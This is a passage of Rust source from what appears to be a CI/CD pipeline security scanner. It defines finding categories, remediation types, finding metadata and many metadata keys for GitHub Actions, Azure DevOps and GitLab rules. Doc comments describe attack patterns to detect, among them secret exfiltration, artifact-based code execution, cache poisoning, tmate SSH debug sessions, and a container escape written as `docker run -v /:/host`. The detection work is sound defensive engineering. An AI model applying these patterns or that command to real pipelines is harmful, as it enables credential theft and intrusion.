601    /// while publish credentials or OIDC authority are present.
602    GhaManifestPythonMBuildWithPrCredentials,
603    /// PR-reachable Cargo compile path can run build.rs/proc-macro code while
604    /// token, secret, OIDC, registry, cloud, or write authority is present.
605    GhaManifestCargoBuildRsPullRequestWithToken,
606    /// PR/workflow_run/issue_comment-reachable Makefile execution occurs while
607    /// secret, token, OIDC, registry, cloud, or write authority is present.
608    GhaManifestMakefileWithPrTriggerAndSecrets,
609    /// Recursive checkout submodules are enabled in a PR-reachable authority
610    /// job, letting PR-mutable .gitmodules influence workspace code.
611    GhaManifestSubmodulesRecursiveWithPrAuthority,
612    /// A cross-repo reusable workflow call uses a mutable branch/tag ref.
613    GhaCrossrepoWorkflowCallFloatingRefCascade,
614    /// A cross-repo reusable workflow call forwards the caller's full secret
615    /// surface with `secrets: inherit`.
616    GhaCrossrepoSecretsInheritUnreviewedCallee,
617    /// Precision guard for actions that install a helper into the toolcache
618    /// and invoke that absolute path instead of resolving a bare helper from
619    /// runner `PATH`.
620    GhaToolcacheAbsolutePathDowngrade,
621    // Reserved — requires ADO/GH API enrichment beyond pipeline YAML.
622    // Sealed against deserialisation: a custom-rule YAML using these
623    // categories errors out with `unknown variant` at load time, because
624    // they cannot be detected from pipeline YAML alone. They still
625    // serialise normally so future runtime-enrichment paths inside the
626    // taudit binary can emit them, and the output schemas advertise them.
627    /// Requires runtime network telemetry or policy enrichment — not detectable from YAML alone.
628    #[serde(skip_deserializing)]
629    #[doc(hidden)]
630    EgressBlindspot,
631    /// Requires external audit-sink configuration data — not detectable from YAML alone.
632    #[serde(skip_deserializing)]
633    #[doc(hidden)]
634    MissingAuditTrail,
635}
636
637// ── Recommendation ───────────────────────────────────────────────
638
639/// Routing: scope findings -> TsafeRemediation; isolation findings -> CellosRemediation.
640#[allow(missing_docs)]
641#[derive(Debug, Clone, Serialize, Deserialize)]
642#[serde(tag = "type", rename_all = "snake_case")]
643pub enum Recommendation {
644    /// Remediate via `tsafe` — narrow / rotate / revoke a credential or scope.
645    TsafeRemediation {
646        command: String,
647        explanation: String,
648    },
649    /// Remediate via CellOS isolation primitives.
650    CellosRemediation { reason: String, spec_hint: String },
651    /// Pin a floating action reference to an immutable SHA.
652    PinAction { current: String, pinned: String },
653    /// Reduce the permissions block on the scope-bearing step.
654    ReducePermissions { current: String, minimum: String },
655    /// Replace a long-lived static credential with a federated OIDC identity.
656    FederateIdentity {
657        static_secret: String,
658        oidc_provider: String,
659    },
660    /// Free-form manual remediation — used when no canned action applies.
661    Manual { action: String },
662}
663
664// ── FindingSource ────────────────────────────────────────────────
665
666/// Provenance of a finding — distinguishes findings emitted by built-in
667/// taudit rules from findings emitted by user-loaded custom invariant YAML
668/// (`--invariants-dir`). Custom rules can emit arbitrarily-worded findings
669/// at any severity, so an operator piping output into a JIRA workflow or
670/// SARIF upload needs a non-spoofable signal of which file the rule came
671/// from. Serializes as `"built-in"` (string) for built-in findings and
672/// `{"custom": "<path>"}` for custom-rule findings — see
673/// `docs/finding-fingerprint.md` for the contract.
674#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
675#[serde(rename_all = "snake_case")]
676pub enum FindingSource {
677    /// Emitted by a built-in rule defined in `taudit-core::rules`. The
678    /// authoritative trust anchor — the binary's release commit defines the
679    /// rule logic. Serialises as the kebab-case string `"built-in"` to match
680    /// `schemas/finding.v1.json`.
681    #[default]
682    #[serde(rename = "built-in")]
683    BuiltIn,
684    /// Emitted by a custom invariant rule loaded from the given YAML file.
685    /// The path is the file the rule was loaded from, retained so operators
686    /// can audit which file produced any given finding.
687    Custom {
688        /// On-disk path of the custom-rule YAML file that produced this finding.
689        source_file: PathBuf,
690    },
691}
692
693impl FindingSource {
694    /// True for findings emitted by built-in rules.
695    pub fn is_built_in(&self) -> bool {
696        matches!(self, FindingSource::BuiltIn)
697    }
698}
699
700// ── FixEffort ────────────────────────────────────────────────────
701
702/// Coarse-grained remediation effort. Surfaces in JSON `time_to_fix` and SARIF
703/// `properties.timeToFix` so triage dashboards can sort by `severity * effort`.
704///
705/// The four buckets are deliberately wide. Precise time estimates would invite
706/// argument; the buckets exist to separate "flip a flag" from "rewrite a job"
707/// from "renegotiate ops policy".
708///
709/// Per `MEMORY/.../blueteam-corpus-defense.md` Section 3 / Enhancement E-3.
710#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
711#[serde(rename_all = "snake_case")]
712pub enum FixEffort {
713    /// ~5 minutes. Mechanical change to a single file (flip a flag, pin a SHA,
714    /// add a `permissions: {}` block). No structural risk.
715    Trivial,
716    /// ~1 hour. Refactor a step or job: split a script, add a fork-check,
717    /// move a secret to an environment binding.
718    Small,
719    /// ~1 day. Restructure a job or pipeline: introduce an environment gate,
720    /// move from inline scripts to a sandboxed action, add an OIDC role.
721    Medium,
722    /// ~1 week or more. Operational policy change: migrate from PATs to OIDC
723    /// across an org, change branch protection model, retire a service principal.
724    Large,
725}
726
727// ── FindingExtras + Finding ──────────────────────────────────────
728
729/// Optional finding metadata. Lives on every `Finding` via
730/// `#[serde(flatten)]` so consumers see the fields at the top of the
731/// finding object — same place they'd appear if declared inline on
732/// `Finding`. Default-constructed extras serialize to nothing (all
733/// `Option::None` and empty `Vec`s skip-serialize), so existing
734/// snapshots remain byte-stable until a rule populates a field.
735///
736/// **Why a wrapper struct?** The 30+ rule call sites use struct
737/// literal syntax. Adding fields directly to `Finding` would force
738/// every site to edit. With `extras: FindingExtras::default()`, new
739/// extras can be added in a single place.
740#[derive(Debug, Clone, Default, Serialize, Deserialize)]
741pub struct FindingExtras {
742    /// Stable UUID v5 over `(NAMESPACE, fingerprint)` — collapses
743    /// per-hop findings against the same authority root into one group
744    /// for SIEM display. See `compute_finding_group_id`.
745    #[serde(default, skip_serializing_if = "Option::is_none")]
746    pub finding_group_id: Option<String>,
747
748    /// Coarse remediation effort. See `FixEffort`.
749    #[serde(default, skip_serializing_if = "Option::is_none")]
750    pub time_to_fix: Option<FixEffort>,
751
752    /// Human-readable list of controls that already neutralise (or partially
753    /// neutralise) this finding — populated when a compensating-control
754    /// detector downgrades severity. Empty when no downgrade applied.
755    #[serde(default, skip_serializing_if = "Vec::is_empty")]
756    pub compensating_controls: Vec<String>,
757
758    /// Set to `true` by the suppression applicator when a matching
759    /// `.taudit-suppressions.yml` entry exists AND the configured mode
760    /// is `Suppress`. The finding still appears in output (audit trail
761    /// preserved) but consumers can filter on this field.
762    #[serde(default, skip_serializing_if = "is_false")]
763    pub suppressed: bool,
764
765    /// Original pre-downgrade severity. Populated by the suppression
766    /// applicator OR a compensating-control detector when `severity`
767    /// is mutated. `None` means the current severity is the rule-emitted
768    /// value.
769    #[serde(default, skip_serializing_if = "Option::is_none")]
770    pub original_severity: Option<Severity>,
771
772    /// Operator-supplied justification from the matching suppression
773    /// entry. `None` when no suppression applies.
774    #[serde(default, skip_serializing_if = "Option::is_none")]
775    pub suppression_reason: Option<String>,
776
777    /// Per-finding stable anchor mixed into the fingerprint canonical
778    /// string. Populated by rules that have no natural graph node to
779    /// place in `nodes_involved` (e.g. ADO `resources.repositories[]`
780    /// aliases, GitLab `include:` entries, workflow-level invariants).
781    /// When two findings of the same rule fire in the same file, their
782    /// anchors must differ for the fingerprints to differ.
783    ///
784    /// Round-trips through JSON so external tools that recompute
785    /// fingerprints from loaded findings get the same value as the
786    /// emitting taudit run. `None` (the default) and `Some("")` are the
787    /// same equivalence class — both contribute the empty marker to the
788    /// canonical string.
789    #[serde(default, skip_serializing_if = "Option::is_none")]
790    pub fingerprint_anchor: Option<String>,
791
792    /// Scope of confidence for this finding. Current built-in rules are
793    /// `yaml_only`: taudit has proved a static authority shape in the scanned
794    /// YAML artifact, but runtime/provider settings may still affect
795    /// exploitability.
796    #[serde(default, skip_serializing_if = "Option::is_none")]
797    pub confidence_scope: Option<String>,
798
799    /// Human-readable runtime or control-plane assumptions that must be
800    /// verified before treating the static finding as live exploitability.
801    #[serde(default, skip_serializing_if = "Vec::is_empty")]
802    pub runtime_preconditions: Vec<String>,
803
804    /// True when exploitability materially depends on provider-side controls
805    /// not represented in the YAML artifact, such as Azure DevOps service
806    /// connection authorization or GitHub repository settings.
807    #[serde(default, skip_serializing_if = "is_false")]
808    pub portal_control_dependency: bool,
809
810    /// Coarse authority kinds involved in the finding: e.g. `job_token`,
811    /// `oidc_identity`, `service_connection`, `variable_group`,
812    /// `credential_named_variable`, `artifact`, or `image`.
813    #[serde(default, skip_serializing_if = "Vec::is_empty")]
814    pub authority_kinds: Vec<String>,
815
816    /// Coarse attacker-influenced surfaces involved in the finding: e.g.
817    /// `untrusted_checkout`, `script_sink`, `mutable_dependency_ref`,
818    /// `reusable_workflow_boundary`, or `self_hosted_runner`.
819    #[serde(default, skip_serializing_if = "Vec::is_empty")]
820    pub attacker_surface_kinds: Vec<String>,
821
822    /// Template/reusable-workflow resolution strength for delegation findings:
823    /// `resolved`, `partial`, `opaque`, or `not_applicable`.
824    #[serde(default, skip_serializing_if = "Option::is_none")]
825    pub template_resolution_strength: Option<String>,
826
827    /// Relationship between this finding and any cited CVE/advisory:
828    /// `same_primitive`, `same_authority_shape`, `analogue_only`, or
829    /// `not_applicable`.
830    #[serde(default, skip_serializing_if = "Option::is_none")]
831    pub cve_relationship: Option<String>,
832}
833
834impl FindingExtras {
835    /// Convenience constructor for the common case of "default extras
836    /// plus a per-finding fingerprint anchor". Used by rules whose
837    /// emission sites have no natural graph-node anchor and need the
838    /// anchor to discriminate multiple findings of the same rule in one
839    /// file (see `compute_fingerprint` v3 contract).
840    pub fn with_anchor(anchor: impl Into<String>) -> Self {
841        Self {
842            fingerprint_anchor: Some(anchor.into()),
843            ..Self::default()
844        }
845    }
846
847    /// Convenience constructor for report-facing metadata that is not a
848    /// fingerprint anchor. Keeps rule call sites additive rather than forcing
849    /// every built-in rule to hand-populate publication context.
850    pub fn with_confidence_scope(scope: impl Into<String>) -> Self {
851        Self {
852            confidence_scope: Some(scope.into()),
853            ..Self::default()
854        }
855    }
856}
857
/// `skip_serializing_if` predicate for the boolean fields of
/// `FindingExtras`: returns `true` when the flag is unset so the field is
/// left out of the output.
// serde hands `skip_serializing_if` functions a reference to the field, so
// the `&bool` parameter is required even though `bool` is `Copy`.
#[allow(clippy::trivially_copy_pass_by_ref)]
fn is_false(b: &bool) -> bool {
    let is_set = *b;
    !is_set
}
862
863/// A finding is a concrete, actionable authority issue.
864#[allow(missing_docs)]
865#[derive(Debug, Clone, Serialize, Deserialize)]
866pub struct Finding {
867    pub severity: Severity,
868    pub category: FindingCategory,
869    #[serde(skip_serializing_if = "Option::is_none")]
870    pub path: Option<PropagationPath>,
871    pub nodes_involved: Vec<NodeId>,
872    pub message: String,
873    pub recommendation: Recommendation,
874    /// Provenance of this finding. Defaults to `BuiltIn` for backward
875    /// compatibility with code/JSON that predates the field — every
876    /// in-tree built-in rule sets this explicitly. Deserialization of older
877    /// JSON without the field treats the finding as built-in.
878    #[serde(default)]
879    pub source: FindingSource,
880    /// Optional metadata (group id, time-to-fix, compensating controls,
881    /// suppression markers). Flattens into the JSON object so consumers
882    /// see top-level fields — see `FindingExtras` for individual semantics.
883    #[serde(flatten, default)]
884    pub extras: FindingExtras,
885}
886
887impl Finding {
888    /// Builder helper: attach a `time_to_fix` annotation to this finding.
889    /// Call sites: `let f = Finding { ... }.with_time_to_fix(FixEffort::Trivial);`
890    pub fn with_time_to_fix(mut self, effort: FixEffort) -> Self {
891        self.extras.time_to_fix = Some(effort);
892        self
893    }
894
895    /// Builder helper: append a compensating control description and
896    /// downgrade severity by one tier (Critical -> High -> Medium -> Low -> Info).
897    /// Records the original severity so the audit trail survives.
898    pub fn with_compensating_control(mut self, control: impl Into<String>) -> Self {
899        let original = self.severity;
900        self.extras.compensating_controls.push(control.into());
901        self.severity = downgrade_severity(self.severity);
902        if self.extras.original_severity.is_none() {
903            self.extras.original_severity = Some(original);
904        }
905        self
906    }
907}
908
909// ── Graph types: NodeId / EdgeId aliases ─────────────────────────
910
/// Identifier of a node in the authority graph.
///
/// **Stability contract.** A `NodeId` is a dense index that is stable only
/// within a single scan / graph emission (`taudit graph --format json`). It
/// is **not** stable across separate scans: two runs over the same input
/// pipeline can renumber nodes if the parser visits them in a different
/// order. Consumers that need identity across runs should key on the
/// finding `fingerprint` (present in JSON / SARIF / CloudEvents output)
/// instead of `NodeId`. See `docs/finding-fingerprint.md`.
pub type NodeId = usize;
921
/// Identifier of an edge in the authority graph.
///
/// **Stability contract.** The caveat on [`NodeId`] applies here too: edge
/// ids are dense indices that are stable within one emitted graph and NOT
/// stable across runs. Use fingerprints for cross-run identity.
pub type EdgeId = usize;
928
929// ── Metadata key constants ───────────────────────────────────────
930// Avoids stringly-typed bugs across crate boundaries.
931//
932// Every constant below is a key string that downstream consumers may read
933// from `Node.metadata` or `AuthorityGraph.metadata` in emitted JSON.
934
/// Digest of a pinned action / image reference.
pub const META_DIGEST: &str = "digest";
/// The `permissions:` block scoped to an Identity / Step node.
pub const META_PERMISSIONS: &str = "permissions";
/// Inferred breadth of an identity's scope (`broad` / `constrained` /
/// `unknown`).
pub const META_IDENTITY_SCOPE: &str = "identity_scope";
/// Flags a metadata value as inferred by the parser rather than read
/// literally.
pub const META_INFERRED: &str = "inferred";
/// Flags an Image node as a job container (not a `uses:` action).
pub const META_CONTAINER: &str = "container";
/// Flags an Identity node as OIDC-capable (`permissions: id-token: write`).
pub const META_OIDC: &str = "oidc";
/// Flags a Secret node whose value is interpolated into a CLI flag argument
/// (e.g. `-var "key=$(SECRET)"`). CLI flag values show up in pipeline log
/// output even when ADO secret masking is active, because the command string
/// is logged before masking runs and Terraform itself logs `-var` values.
pub const META_CLI_FLAG_EXPOSED: &str = "cli_flag_exposed";
/// Graph-level metadata: the trigger type (e.g. `pull_request_target`, `pr`).
pub const META_TRIGGER: &str = "trigger";
/// Flags a Step that writes to the environment gate (`$GITHUB_ENV`, ADO
/// `##vso[task.setvariable]`).
pub const META_WRITES_ENV_GATE: &str = "writes_env_gate";
/// Flags a Step that writes a `$(secretRef)` value to the env gate. Set
/// together with META_WRITES_ENV_GATE when the written VALUE contains an ADO
/// `$(VAR)` expression, which separates secret exfiltration from
/// plain-integer or literal env-gate writes.
pub const META_ENV_GATE_WRITES_SECRET_VALUE: &str = "env_gate_writes_secret_value";
/// Flags a Step that originated from an ADO `##vso[task.setvariable]` call
/// (as opposed to a GHA `>> $GITHUB_ENV` redirect). Lets the two env-gate
/// write patterns be told apart so BUG-4 suppression only applies to ADO
/// plain-value writes.
pub const META_SETVARIABLE_ADO: &str = "setvariable_ado";
/// Flags a Step that reads from the runner-managed environment through an
/// `env.<NAME>` template reference — `${{ env.X }}` in a `with:` value, an
/// inline script body, or a step `env:` mapping. This differs from
/// `secrets.X` references (which produce a HasAccessTo edge to a Secret
/// node): `env.X` references can be sourced from the ambient runner
/// environment, including values laundered through `$GITHUB_ENV` by an
/// earlier step. The GHA parser stamps it so that
/// `secret_via_env_gate_to_untrusted_consumer` can find the gate-laundering
/// chain that the explicit-secret rules miss.
pub const META_READS_ENV: &str = "reads_env";
/// Flags a Step that performs cryptographic provenance attestation (e.g.
/// `actions/attest-build-provenance`).
pub const META_ATTESTS: &str = "attests";
/// Flags a Secret node sourced from an ADO variable group (vs an inline
/// pipeline variable).
pub const META_VARIABLE_GROUP: &str = "variable_group";
/// Flags an Image node as a self-hosted agent pool (pool.name on ADO;
/// runs-on: self-hosted on GHA).
pub const META_SELF_HOSTED: &str = "self_hosted";
/// Flags a Step that performs a `checkout: self` (ADO) or a default
/// `actions/checkout` on a PR context.
pub const META_CHECKOUT_SELF: &str = "checkout_self";
/// Flags an Identity node as an ADO service connection.
pub const META_SERVICE_CONNECTION: &str = "service_connection";
/// Flags an Identity node as implicitly injected by the platform (e.g. ADO
/// System.AccessToken). Implicit tokens are structurally accessible to all
/// tasks by platform design, so exposure to untrusted steps is Info-level
/// (structural) rather than Critical (misconfiguration).
pub const META_IMPLICIT: &str = "implicit";
/// Flags a Step belonging to an ADO deployment job whose `environment:` is
/// configured with required approvals — a manual gate that breaks automatic
/// authority propagation. A finding whose path crosses such a node has its
/// severity reduced by one step (Critical → High → Medium → Low).
pub const META_ENV_APPROVAL: &str = "env_approval";
/// Parent job name, recorded on every Step node. Enables per-job subgraph
/// filtering (e.g. `taudit map --job build`) and lets downstream consumers
/// attribute steps back to their containing job. Both the GHA and ADO
/// parsers set it on every Step they create within a job's scope.
pub const META_JOB_NAME: &str = "job_name";
/// Step-level metadata: the normalized GitHub Actions `uses:` action name
/// with its `@ref` suffix removed, for example `docker/login-action`. Only
/// the GHA parser sets it, and only on `uses:` steps.
pub const META_GHA_ACTION: &str = "gha_action";
/// Step-level metadata: the sorted scalar `with:` inputs of a GHA `uses:`
/// step, encoded as newline-delimited `key=value` records. Non-scalar inputs
/// are left out. Read by action-specific rules that need precision controls
/// such as `mask-password: false` or `skip_install: true`.
pub const META_GHA_WITH_INPUTS: &str = "gha_with_inputs";
/// Step-level metadata: the sorted effective GitHub Actions `env:`
/// assignments after the workflow ⊕ job ⊕ step merge, encoded as
/// newline-delimited `key=value` records. Values are the literal
/// YAML/template strings, not secret values. Read by env-config and
/// runtime-startup-injection rules.
pub const META_GHA_ENV_ASSIGNMENTS: &str = "gha_env_assignments";
/// Graph-level metadata: comma-joined list of the `workflow_call.inputs.*`
/// names a reusable workflow declares. Empty / absent for ordinary workflows.
pub const META_GHA_WORKFLOW_CALL_INPUTS: &str = "gha_workflow_call_inputs";
/// Step-level metadata: the raw `jobs.<id>.runs-on` value rendered into a
/// compact deterministic string. Present on every step in the job and on
/// synthetic reusable-workflow caller steps.
pub const META_GHA_RUNS_ON: &str = "gha_runs_on";
/// Image-node metadata: the raw `jobs.<id>.container.options` value, when
/// present. Stored apart from the image name because container options can
/// carry runtime privilege flags even when the image is pinned.
pub const META_GHA_CONTAINER_OPTIONS: &str = "gha_container_options";
/// Graph-level metadata: JSON-encoded array of the `resources.repositories[]`
/// entries the pipeline declares. Each entry is an object with the fields
/// `alias`, `repo_type`, `name`, an optional `ref`, and `used` (true when
/// the alias is referenced via `template: x@alias`, `extends: x@alias`, or
/// `checkout: alias` somewhere in the same pipeline file). Written by the
/// ADO parser; read by `template_extends_unpinned_branch`.
pub const META_REPOSITORIES: &str = "repositories";
/// Raw inline script body of a Step (the text from `script:` / `bash:` /
/// `powershell:` / `pwsh:` / `run:` / task `inputs.script` /
/// `inputs.Inline` / `inputs.inlineScript`). Parsers stamp it whenever the
/// step has an inline script. Read by the script-aware rules:
/// `vm_remote_exec_via_pipeline_secret`,
/// `short_lived_sas_in_command_line`, `secret_to_inline_script_env_export`,
/// `secret_materialised_to_workspace_file`, `keyvault_secret_to_plaintext`,
/// `add_spn_with_inline_script`, `parameter_interpolation_into_shell`.
/// The text is stored verbatim — each rule applies its own pattern matching.
pub const META_SCRIPT_BODY: &str = "script_body";
/// Name of the ADO service connection a step uses (the value of
/// `inputs.azureSubscription` / `inputs.connectedServiceName*`). Recorded on
/// the Step node itself (in addition to the Identity node it links to) so
/// rules can pattern-match on the connection name without traversing edges.
pub const META_SERVICE_CONNECTION_NAME: &str = "service_connection_name";
/// Flags a Step that performs `terraform apply ... -auto-approve`, whether
/// through an inline script or through a `TerraformCLI` / `TerraformTask`
/// task with `command: apply` and `commandOptions` containing `auto-approve`.
pub const META_TERRAFORM_AUTO_APPROVE: &str = "terraform_auto_approve";
/// Flags a Step task that runs with `addSpnToEnvironment: true`, which
/// exposes the federated SPN (idToken / servicePrincipalKey /
/// servicePrincipalId / tenantId) to the inline script body through
/// environment variables.
pub const META_ADD_SPN_TO_ENV: &str = "add_spn_to_environment";
/// Graph-level metadata: the source platform of the parsed pipeline. Every
/// parser sets it to its `platform()` value (`"github-actions"`,
/// `"azure-devops"`, `"gitlab"`), so platform-scoped rules can gate their
/// detection without parsing the source file path.
pub const META_PLATFORM: &str = "platform";
/// Graph-level metadata: flags a GitHub Actions workflow that declares NO
/// top-level `permissions:` block. The GHA parser sets it when
/// `workflow.permissions` is absent so rules can detect the negative-space
/// "no permissions block at all" pattern (which leaves `GITHUB_TOKEN` at its
/// broad platform default — `contents: write`, `packages: write`, etc.).
pub const META_NO_WORKFLOW_PERMISSIONS: &str = "no_workflow_permissions";
/// Flags a Step in a GHA workflow whose `if:` condition references the
/// standard fork-check pattern
/// (`github.event.pull_request.head.repo.fork == false` or the equivalent
/// `head.repo.full_name == github.repository`). The GHA parser stamps it so
/// rules can credit the step with the compensating control without
/// re-parsing the YAML expression. The bool is stored as `"true"`.
pub const META_FORK_CHECK: &str = "fork_check";
/// Flags a GitLab CI job (Step node) whose `rules:` or `only:` clause
/// restricts execution to protected branches — through an explicit
/// `if: $CI_COMMIT_REF_PROTECTED == "true"` rule, an `if: $CI_COMMIT_BRANCH
/// == $CI_DEFAULT_BRANCH` rule, or an `only: [main, ...]` allowlist of
/// platform-protected refs. Set by the GitLab parser. Its absence on a
/// deployment job is a control gap.
pub const META_RULES_PROTECTED_ONLY: &str = "rules_protected_only";
1076/// Graph-level metadata: comma-joined list of every entry under `on:` (e.g.
1077/// `pull_request_target,issue_comment,workflow_run`). Distinct from
1078/// `META_TRIGGER` (singular) which is set only for `pull_request_target` /
1079/// ADO `pr` to preserve the existing `trigger_context_mismatch` contract.
1080/// Consumers of this list (e.g. `risky_trigger_with_authority`) must split on
1081/// `,` and treat each token as a trigger name.
1082pub const META_TRIGGERS: &str = "triggers";
/// Graph-level metadata: comma-joined list of `workflow_dispatch.inputs.*`
/// names declared by the workflow. Empty / absent if the workflow has no
/// `workflow_dispatch` trigger.
///
/// Consumed by `manual_dispatch_input_to_url_or_command` to taint-track input
/// flow into command lines, URLs, and `actions/checkout` refs.
pub const META_DISPATCH_INPUTS: &str = "dispatch_inputs";
/// Graph-level metadata: one plain-text record per
/// `jobs.<id>.outputs.<name>`.
///
/// Format: records are joined with `|`; each record is
/// `<job>\t<name>\t<source>` (fields within a record are separated by `\t`).
/// `source` is one of:
/// - `secret` — the value reads `secrets.*`
/// - `oidc` — the value references `steps.*.outputs.*` from a step that
///   holds an OIDC identity
/// - `step_output` — any other `steps.*.outputs.*`
/// - `literal`
///
/// Plain-text rather than JSON to keep the parser crate free of
/// `serde_json`. Consumed by `sensitive_value_in_job_output`.
pub const META_JOB_OUTPUTS: &str = "job_outputs";
/// Step-level metadata: the value passed to `actions/checkout`'s `with.ref`
/// input (verbatim, including any `${{ … }}` expressions). Stamped only on
/// `actions/checkout` steps that supply a `ref:`.
///
/// Consumed by `manual_dispatch_input_to_url_or_command`.
pub const META_CHECKOUT_REF: &str = "checkout_ref";
/// Marks the synthetic Step node created for a job that delegates to a
/// reusable workflow with `secrets: inherit`. The whole secret bag forwards
/// to the callee regardless of what the callee actually consumes — when the
/// caller is fired by an attacker-controllable trigger this is a wide-open
/// exfiltration path.
///
/// Set on the synthetic step node by the GHA parser.
pub const META_SECRETS_INHERIT: &str = "secrets_inherit";
/// Marks a Step that downloads a workflow artifact (typically
/// `actions/download-artifact` or `dawidd6/action-download-artifact`).
///
/// In `workflow_run`-triggered consumers, the originating run's artifacts
/// were produced from PR context — the consumer must treat their content as
/// untrusted input even when the consumer itself runs with elevated perms.
pub const META_DOWNLOADS_ARTIFACT: &str = "downloads_artifact";
/// Marks a Step whose body interprets artifact (or other untrusted file)
/// content into a privileged sink — `unzip`/`tar -x`, `cat`/`jq` piping
/// into `>> $GITHUB_ENV`/`>> $GITHUB_OUTPUT`, `eval`, posting to a PR
/// comment via `actions/github-script` `body:`/`issue_body:`, or evaluating
/// extracted text.
///
/// Combined with [`META_DOWNLOADS_ARTIFACT`] upstream in the same job and a
/// `workflow_run`/`pull_request_target` trigger this is the classic
/// mypy_primer / coverage-comment artifact-RCE pattern.
pub const META_INTERPRETS_ARTIFACT: &str = "interprets_artifact";
/// Marks a Step that uses an interactive debug action (mxschmitt/action-tmate,
/// lhotari/action-upterm, actions/tmate, etc.).
///
/// Value: the action reference (e.g. `mxschmitt/action-tmate@v3`).
///
/// A successful debug session gives the operator an external SSH endpoint
/// with the runner's full environment loaded — every secret in scope, the
/// checked-out HEAD, and write access to whatever the GITHUB_TOKEN holds.
pub const META_INTERACTIVE_DEBUG: &str = "interactive_debug";
/// Marks a Step that calls `actions/cache` (or `actions/cache/save` /
/// `actions/cache/restore`).
///
/// Value: the raw `key:` input from the step's `with:` block.
///
/// Consumed by `pr_specific_cache_key_in_default_branch_consumer` to detect
/// PR-derived cache keys (head_ref, head.ref, actor) that a default-branch
/// run can later restore — classic cache poisoning.
pub const META_CACHE_KEY: &str = "cache_key";
/// Records the OIDC audience (`aud:`) value of an `id_tokens:` entry on an
/// Identity node. GitLab CI emits one Identity per `id_tokens:` key; the
/// audience is what trades for downstream cloud creds (Vault path, AWS role,
/// etc.), so audience reuse across MR-context and protected-context jobs is
/// the precise privilege-overscope signal.
///
/// Set by the GitLab parser.
pub const META_OIDC_AUDIENCE: &str = "oidc_audience";
/// Records the comma-joined list of `id_tokens.aud:` values when GitLab CI
/// declares the audience as a YAML sequence (multi-cloud broker — strongest
/// over-scoping signal).
///
/// When set, the legacy [`META_OIDC_AUDIENCE`] field holds the same
/// comma-joined string for backward compatibility, and this field is the
/// explicit "this was a list" marker. Set by the GitLab parser only on the
/// multi-aud path; absent for scalar `aud:` values.
pub const META_OIDC_AUDIENCES: &str = "oidc_audiences";
/// Records a Step's `environment:url:` value verbatim. Stamped by the GitLab
/// parser when the job declares an `environment:` mapping with a `url:`
/// field.
///
/// Consumed by `untrusted_ci_var_in_shell_interpolation` because
/// `environment:url:` is rendered by the GitLab UI and any predefined-CI-var
/// interpolated into it is a stored-XSS / open-redirect sink.
pub const META_ENVIRONMENT_URL: &str = "environment_url";
/// Graph-level metadata: JSON-encoded array of `include:` entries declared by
/// a GitLab CI pipeline. Each entry is an object with fields:
/// - `kind`: one of `local`, `remote`, `template`, `project`, `component`
/// - `target`: the path/URL/project string
/// - `git_ref`: the resolved `ref:` value (only meaningful for `project` and
///   `remote`) — empty string when the include omits a `ref:`
///
/// Set by the GitLab parser; consumed by `unpinned_include_remote_or_branch_ref`.
pub const META_GITLAB_INCLUDES: &str = "gitlab_includes";
/// Marks a Step (GitLab job) that declares one or more `services:` entries
/// matching `docker:*-dind` or `docker:dind`.
///
/// Combined with secret-bearing HasAccessTo edges it indicates a runtime
/// sandbox-escape primitive — any inline build step can
/// `docker run -v /:/host` from inside dind.
pub const META_GITLAB_DIND_SERVICE: &str = "gitlab_dind_service";
/// Marks a Step (GitLab job) declared with `allow_failure: true`.
///
/// Used by `security_job_silently_skipped` to detect scanner jobs that pass
/// silently.
pub const META_GITLAB_ALLOW_FAILURE: &str = "gitlab_allow_failure";
/// Records the comma-joined list of `extends:` template names a GitLab job
/// inherits from.
///
/// Used by scanner-name pattern matching in `security_job_silently_skipped`
/// because GitLab security templates are usually consumed via `extends:`
/// rather than by job-name match.
pub const META_GITLAB_EXTENDS: &str = "gitlab_extends";
/// Marks a Step (GitLab job) that defines a `trigger:` block (downstream /
/// child pipeline).
///
/// Value:
/// - `"static"` for a fixed downstream `project:` or `include:` of in-tree
///   YAML,
/// - `"dynamic"` when the include source is an `artifact:` (dynamic child
///   pipelines — code-injection sink).
pub const META_GITLAB_TRIGGER_KIND: &str = "gitlab_trigger_kind";
/// Records the literal `cache.key:` value declared on a GitLab job (or the
/// empty string if no cache is declared). This is the GitLab counterpart of
/// [`META_CACHE_KEY`], which records the `actions/cache` key on GHA steps.
///
/// Consumed by `cache_key_crosses_trust_boundary` to detect cross-trust
/// cache keys.
pub const META_GITLAB_CACHE_KEY: &str = "gitlab_cache_key";
/// Records the `cache.policy:` value declared on a GitLab job
/// (`pull` / `push` / `pull-push` / `pull_push`). When absent, the GitLab
/// runtime default is `pull-push`.
///
/// Consumed by `cache_key_crosses_trust_boundary`.
pub const META_GITLAB_CACHE_POLICY: &str = "gitlab_cache_policy";
/// Records the deployment environment name on a Step
/// (e.g. GitLab `environment.name:` / GHA `environment:`).
///
/// Used by rules that gate on production-like environment names.
pub const META_ENVIRONMENT_NAME: &str = "environment_name";
/// Records the GitLab `artifacts.reports.dotenv:` file path for a Step.
///
/// When set, the file's `KEY=value` lines are silently exported as
/// pipeline variables for every downstream job that consumes this job
/// via `needs:` or `dependencies:`. Consumed by
/// `dotenv_artifact_flows_to_privileged_deployment`.
pub const META_DOTENV_FILE: &str = "dotenv_file";
/// Records, on a Step, the upstream job names this step consumes via
/// GitLab `needs:` or `dependencies:`.
///
/// Value: comma-separated job names. Used to build dotenv-flow dependency
/// chains across stages.
pub const META_NEEDS: &str = "needs";
/// Marks an Image node (self-hosted agent pool) as having workspace isolation
/// configured (`workspace: { clean: all }` or `workspace: { clean: true }` in
/// ADO). When present, the agent workspace is wiped between runs, mitigating
/// workspace poisoning attacks where a PR build leaves malicious files for the
/// next privileged pipeline run.
///
/// Absence of this key on a self-hosted Image node is the signal for
/// `shared_self_hosted_pool_no_isolation`.
pub const META_WORKSPACE_CLEAN: &str = "workspace_clean";
/// Step-level metadata: the AND-joined chain of `condition:` expressions that
/// gate this step's runtime execution (stage condition, then job condition,
/// then step condition, joined with ` AND `). Stamped by parsers that surface
/// runtime gating expressions — currently the ADO parser (stage / job / step
/// `condition:`).
///
/// Presence of this key means the step is NOT unconditionally reachable on
/// every trigger; the runtime evaluator decides via expression
/// (e.g. `eq(variables['Build.SourceBranch'], 'refs/heads/main')`). Consumed
/// by `apply_compensating_controls` to downgrade severity on findings whose
/// firing step is gated behind a conditional.
pub const META_CONDITION: &str = "condition";
/// Step-level metadata: comma-joined list of upstream stage / job names this
